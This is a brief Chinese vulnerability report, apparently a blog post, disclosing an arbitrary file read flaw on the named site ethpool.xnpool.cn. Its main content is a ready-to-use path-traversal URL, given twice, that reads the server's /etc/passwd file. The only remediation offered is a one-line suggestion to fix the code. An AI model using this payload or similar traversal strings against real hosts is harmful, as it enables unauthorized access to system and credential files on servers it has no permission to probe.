本文揭示了一个存在于ethpool.xnpool.cn站点的任意文件读取漏洞,通过构造特定URL可以读取服务器上的/etc/passwd文件,展示了漏洞的利用方式,并提出了从代码层面进行修复的建议。
漏洞URL:如果是Web就填写此项
http://ethpool.xnpool.cn:9080/assets/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
简要描述:漏洞说明、利用条件、危害等
任意文件读取
漏洞证明:
漏洞利用代码:
http://ethpool.xnpool.cn:9080/assets/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
修复方案:
从代码层修改
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
